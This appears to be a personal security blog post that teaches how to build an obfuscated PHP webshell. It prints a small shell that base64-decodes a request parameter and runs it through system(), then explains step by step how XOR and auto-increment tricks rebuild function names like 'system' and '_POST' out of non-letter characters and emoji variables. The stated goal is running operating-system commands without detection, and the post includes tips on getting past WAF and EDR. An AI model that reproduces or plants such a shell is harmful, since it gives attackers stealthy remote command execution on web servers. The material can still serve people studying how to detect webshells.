Introduction

Last time I tried to push myself on learning how to construct a webshell without using any alphabet in PHP. There are a lot of techniques that can be used such as base operation, auto increment, XOR and etc. This blog have decent techniques that can be used for obfuscation.

Objective of obfuscated webshell

The objective of obfuscation webshell is simple, execute os command without detection. Im assuming the server’s configuration is not disabling php functions like system(), passthru(), shell_exec() and other functions that can execute OS command. If the server disabling those function, there will be another topic to bypass the protection. In this blog, we are going to use base64 as encoding, well, it is not recommended in the real world because WAF and EDR pretty good handling base64, so consider to use other method to encode/encrypt when the payload. Anyway, below is my simple webshell:

<?php

$a = $_REQUEST_[4] ? base64_decode($_REQUEST[4]) : 'whoami'; // [1]
@system($a); // [2]
  • [1]: try to check if $_REQUEST[4] is empty or not, if not empty, decode it using base64 and store it in $a variable. Otherwise, it’ll store whoami instead.
  • [2]: Execute command from variable $a.

The idea is simple. The crucial part is how to generate alphabet without using alphabet at all. One of my idea is by using XOR and auto increment operation to generate alphabet and numbers, and set it to emoji as variable. Below are how I use auto increment to generate alphabets.

Figure 1: Variable iteration

Figure 1: Variable iteration

Based on Figure 1:

  • line 3: Set $_ variable to an array.
  • line 4: Convert array to “Array” in string datatype.
  • line 5: ("_" == "_") is comparing two string, if true it will return 1. ("_" == "_") + ("_" == "_"), then (1) + (1) and becomes 2.
  • line 6: @$_[++$__] means @$_[3], so it will takes 4th argument from “Array” which is “a”.
  • line 8-33: Set emoji to ‘a’ until ‘z’. When we increment variable that contains “a”, it will become “b” and so on.

After constructing alphabet, then we can use the certain function like base64_decode(), $_POST[] and system(). Noted that we cannot use eval() as variable since it is a constructor, not a variable function.

Figure 2: Contruct emoji operation

Figure 2: Contruct emoji operation

Based on Figure 2:

  • line 35-37: increment the number.
  • line 38: set variable $πŸ‘Ώ to “base6”.
  • line 39-40: decrement the number.
  • line 41: construct the word “base64_decode”. If you notice, we are using XOR operation to this line to contruct an ascii underscore “_” by xoring hastag with pipe(I would say) "#" ^ "|"
  • line 43: set variable $πŸ’€ to “system”.
  • line 44: set variable $πŸ₯³ as “_POST” by using XOR operation to create underscore and capital letter since we do not create capital letter at all.
  • line 45: check if $_POST[4] is set, if set, it will decode the parameter, otherwise set it to “whoami” to variable $🀯.
  • line 46: execute system() with given command.

Full source code

You can get the full source code at my github.

Figure 3: Full source code

Figure 3: Full source code

Summary

Now, we already learnt how to use XOR and auto increment operation to generate alphabet and numbers. These methods allow us to construct webshell using emoji. I never use this in real world scenario, but if you have your own version and want share, do let me know. 🌡